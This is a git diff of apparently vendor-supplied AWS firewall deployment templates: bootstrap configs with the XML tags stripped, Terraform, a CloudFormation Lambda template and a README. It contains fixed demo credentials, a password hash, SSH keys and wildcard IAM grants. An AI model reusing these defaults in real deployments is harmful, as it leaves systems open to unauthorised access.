+ + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.11.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.21.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw2 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.11.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt new file mode 100644 index 00000000..2fd77546 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw2 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf b/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf new file mode 100644 index 00000000..cb138478 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf @@ -0,0 +1,161 @@ +#************************************************************************************ +# CREATE 2 S3 BUCKETS FOR FW1 & FW2 +#************************************************************************************ +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw1" { + bucket = "${join("", list(var.bootstrap_s3bucket1_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw2" { + bucket = "${join("", list(var.bootstrap_s3bucket2_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + + +#************************************************************************************ +# CREATE FW1 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw1 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw1/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw1/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw1/authcodes" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE FW2 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw2 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw2/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw2/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" 
+ acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw2/authcodes" +} + +resource "aws_s3_bucket_object" "content2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE & ASSIGN IAM ROLE, POLICY, & INSTANCE PROFILE +#************************************************************************************ +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role" + + assume_role_policy = < + +

+
+### Requirements
+* Existing Transit Gateway
+* Existing Transit Gateway route table for the Security-VPC attachment
+* EC2 Key Pair for deployment region
+* UN/PW: **pandemo** / **demopassword**
+
+
+### How to Deploy
+1. Open **variables.tf** in a text editor.
+2. Uncomment the default values and add the correct value for each of the following variables (a placeholder sketch appears after this README):
+   * **fw_ami**
+     * Firewall AMI for AWS Region, SKU, & PAN-OS version.
+   * **fw_sg_source**
+     * Source prefix to apply to the VM-Series mgmt. interface
+   * **tgw_id**
+     * Existing Transit Gateway ID
+   * **tgw_rtb_id**
+     * Existing Transit Gateway Route Table ID
+3. Save **variables.tf**.
+4. BYOL ONLY
+   * If you want to license the VM-Series on creation, copy and paste your Auth Code into the /bootstrap/authcodes file. The Auth Code must be registered with your Palo Alto Networks support account before proceeding.
+Before proceeding, make sure you have accepted and subscribed to the VM-Series software in the AWS Marketplace.
+
+## Notes
+1. us-gov-west was used for deployment testing. It should work in other regions provided the underlying features are available.
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
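For orientation, here is a minimal sketch of what the uncommented block in **variables.tf** might look like after step 2. The AMI ID, source prefix, and transit gateway IDs below are placeholders, not values shipped with this template; substitute the ones for your own region and account.

```hcl
# Sketch only -- every default below is a placeholder.
variable "fw_ami" {
  description = "VM-Series AMI for the target AWS Region, SKU, and PAN-OS version"
  default     = "ami-0123456789abcdef0"      # placeholder AMI ID
}

variable "fw_sg_source" {
  description = "Source prefix allowed to reach the VM-Series mgmt. interface"
  default     = "203.0.113.0/24"             # placeholder management source prefix
}

variable "tgw_id" {
  description = "Existing Transit Gateway ID"
  default     = "tgw-0abc123def4567890"      # placeholder Transit Gateway ID
}

variable "tgw_rtb_id" {
  description = "Existing Transit Gateway route table ID for the Security-VPC attachment"
  default     = "tgw-rtb-0abc123def4567890"  # placeholder TGW route table ID
}
```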
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes new file mode 100644 index 00000000..8d1c8b69 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..e0db5fed --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml @@ -0,0 +1,439 @@ + + + + + + ***** + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + + + + + yes + + + $1$hqikhfkl$1Z1t7bvONQJM1IAh0erho1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + yes + no + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + 192.168.10.16 + 255.255.255.0 + 192.168.10.1 + PA-VM + no + + + + yes + + + FQDN + + + + yes + no + no + no + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + mgmt-interface-swap + + + + yes + security-i-secur-Publi-MBTK5R0EMJSF_ASG_us-east-1a + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 10.255.1.4 + UNTRUST-IP-address + +
+
+
+
+
+
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..c77f637b --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip new file mode 100644 index 00000000..066e08bc Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip differ diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template new file mode 100644 index 00000000..147b7f09 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template @@ -0,0 +1,486 @@ +{ + "AWSTemplateFormatVersion" : "2010-09-09", + "Description" : "Creates an AWS Network Load balancer, which multiplexes traffic to registered scaled out back end web servers", + "Parameters": { + "NLBName": { + "Type" : "String", + "Description": "Enter the name of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "120" + }, + "NLBARN": { + "Type" : "String", + "Description": "Enter the ARN of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "150" + }, + "QueueURL": { + "Type" : "String", + "Description": "Enter the URL of the Queue to send messages to", + "MinLength" : "3", + "MaxLength" : "1024" + }, + "TableName": { + "Type" : "String", + "Default": "nlb_db_tbl", + "Description": "Enter the name of the database table", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3BucketName": { + "Type" : "String", + "Description": "Enter the name of the S3 Bucket which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3ObjectName": { + "Type" : "String", + "Default": "nlb.zip", + "Description": "Enter the name of the S3 object which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "RoleARN": { + "Type": "String", + "Default": "", + "Description": "The ARN of the role to use for Cross Account Access", + "MaxLength" : "120" + }, + "ExternalId": { + "Type": "String", + "Default": "", + "Description": "The external ID associated with the Cross Account Role", + "MaxLength" : "120" + }, + "SameAccount": { + "Type": "String", + "Default": "true", + "Description": "Flag to indicate if the NLB will be deployed into the same account or a different one", + "AllowedValues": [ + "true", + "false" + ] + } + }, + "Metadata" : { + "AWS::CloudFormation::Interface" : { + "ParameterLabels" : { + "NLB ARN": {"Ref": "NLBARN"}, + "NLB Name": {"Ref": "NLBNAME"}, + "Queue URL": {"Ref": "QueueURL"}, + "Table Name": {"Ref": "TableName"}, + "Lambda S3 Bucket Name": {"Ref": "S3BucketName"}, + "Lambda S3 Object Name": {"Ref": "S3ObjectName"} + } + } + }, + "Conditions": { + "CreateCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "false"] }, + "NoCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "true"] } + }, + "Resources": { + "LambdaExecutionRole0" : { + "Type": "AWS::IAM::Role", + "Condition": "NoCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": 
"lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws-us-gov:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "LambdaExecutionRole1" : { + "Type": "AWS::IAM::Role", + "Condition": "CreateCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Resource": {"Ref": "RoleARN"} + }, + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ 
"arn:aws-us-gov:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws-us-gov:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "NLBDeployerLambda0" : { + "Type": "AWS::Lambda::Function", + "Condition": "NoCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole0", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "NLBDeployerLambda1" : { + "Type": "AWS::Lambda::Function", + "Condition": "CreateCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole1", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "LambdaCustomResource0": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "NoCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda0"], 
+ "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda0", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole0"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + }, + "LambdaCustomResource1": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "CreateCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda1"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda1", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole1"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + } + } +} diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip new file mode 100644 index 00000000..83dbc829 Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip differ diff --git a/aws/tgw_inbound_asg-GovCloud/diagram.png b/aws/tgw_inbound_asg-GovCloud/diagram.png new file mode 100644 index 00000000..59f6541c Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/diagram.png differ diff --git a/aws/tgw_inbound_asg-GovCloud/main.tf b/aws/tgw_inbound_asg-GovCloud/main.tf new file mode 100644 index 00000000..28726fb0 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/main.tf @@ -0,0 +1,87 @@ +/* + SUPPORT POLICY +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. +These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as +and when possible. We do not provide technical support or help in using or troubleshooting the components of +the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized +Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) +by the scripts or templates are still supported, but the support is only for the product functionality and +not for help in deploying or using the template or script itself. Unless explicitly tagged, all projects or +work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official +Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. 
